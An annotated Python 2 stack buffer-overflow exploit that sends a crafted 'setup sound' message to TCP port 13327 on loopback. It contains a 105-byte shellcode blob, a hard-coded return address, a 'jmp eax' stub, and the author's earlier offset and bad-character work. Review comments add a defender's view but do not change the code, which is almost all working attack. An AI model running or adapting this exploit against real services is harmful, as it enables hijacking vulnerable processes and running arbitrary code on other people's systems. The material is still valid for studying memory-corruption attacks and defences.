Author: Not specified Language: text
Description: Not specified Timestamp: 2017-09-07 00:10:43 +0000
#!/usr/bin/python
# Python 2 proof-of-concept (print statements, byte-valued str literals).
# It builds one oversized "setup sound" message, sends it to TCP port 13327
# on the loopback address, prints whatever the service answers, and exits.
#
# Defender's view: the only protocol text on the wire is the prefix
# "\x11(setup sound " followed by a 4379-byte argument and a 3-byte trailer.
# An argument of that length is the anomaly worth alerting on. Presumably the
# service copies it into a fixed-size buffer without a length check; the
# server side is not shown in this listing.
import socket

# payload: 105 bytes (7 lines x 15 escapes) of machine code. What it does
# cannot be read off this listing.
# NOTE(review): disassemble it in an isolated analysis environment before
# trusting any description of its behaviour.
payload = ("\xbf\xbe\xb0\xb3\xfc\xdb\xc6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x14\x83\xc6\x04\x31\x7e\x10\x03\x7e\x10\x5c\x45\x82\x27\x57"
"\x45\xb6\x94\xc4\xe0\x3b\x92\x0b\x44\x5d\x69\x4b\xfe\xfc\x23"
"\x23\x03\x01\xd5\xef\x69\x11\x84\x5f\xe7\xf0\x4c\x39\xaf\x3f"
"\x10\x4c\x0e\xc4\xa2\x4a\x21\xa2\x09\xd2\x02\x9b\xf4\x1f\x04"
"\x48\xa1\xf5\x3a\x37\x9f\x89\x0c\xbe\xe7\xe1\xa1\x6f\x6b\x99"
"\xd5\x40\xe9\x30\x48\x16\x0e\x92\xc7\xa1\x30\xa2\xe3\x7c\x32")

# Loopback address: the service is reached on the same machine.
host="127.0.0.1"
# Earlier iteration kept by the author: 4379 filler bytes, the same total
# length as the final argument (4368 + 4 + 5 + 2).
#crash="\x41" * 4379
# Little-endian byte order of 0x08134597, the address recorded in the
# author's note further down.
# NOTE(review): a hard-coded address is only usable when the target image
# loads at a fixed base. Presumably the target lacks ASLR/PIE, stack
# protectors and a non-executable stack; rebuilding with those enabled is the
# mitigation to confirm.
ret="\x97\x45\x13\x08"
# Earlier iteration: filler up to offset 4368, then ret and the 5-byte stub.
#crash="\x41"*4368 + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90"*2
# Layout of the final 4379-byte argument:
#     10 x 0x90
#    105   payload
#   4253 x 0x41 filler (4368 - 10 - 105), so that ret starts at offset 4368
#      4   ret
#      5   "\x83\xC0\x0C\xFF\xE0" = add eax,12 ; jmp eax (nasm output below)
#      2 x 0x90
crash="\x90"*10 + payload + "\x41" * (4368-10-105) + ret + "\x83\xC0\x0C\xFF\xE0" + "\x90"*2
# Leftover from locating the overwritten return address (marked DELETE by
# the author).
#DELETE eip="\x42"*4
# Byte values the author lists as unusable inside the argument:
#badchars \x00,\x0a,\x0d,\x20
# Assembler output for the 5-byte stub placed after ret:
# nasm > jmp eax
# 00000000  FFE0              jmp eax
# nasm > add eax,12
# 00000000  83C00C            add eax,byte +0xc
# nasm >
# NOTE(review): this note says "jmp esp" while the stub above jumps through
# eax; which instruction actually sits at 0x08134597 cannot be confirmed from
# this listing.
#jmp,esp located at 08134597

# Full message: 0x11 byte, the "(setup sound " command text, the argument,
# then the trailer "\x90\x00#". The \x00 listed under badchars appears only
# in this trailer, after the argument.
buffer = "\x11(setup sound " + crash + "\x90\x00#"
# Earlier iteration that sent a cyclic pattern in place of the argument.
#buffer = "\x11(setup sound " + pattern + "\x90\x00#"

# Plain blocking TCP socket; no timeout is set, so connect() and recv() wait
# indefinitely if the peer never answers.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "[*] Sending evil buffer..."
s.connect((host, 13327))
s.send(buffer)
# Reads at most 1024 bytes of reply and prints them unmodified.
data = s.recv(1024)
print data
s.close()
print "[*]Payload Sent !"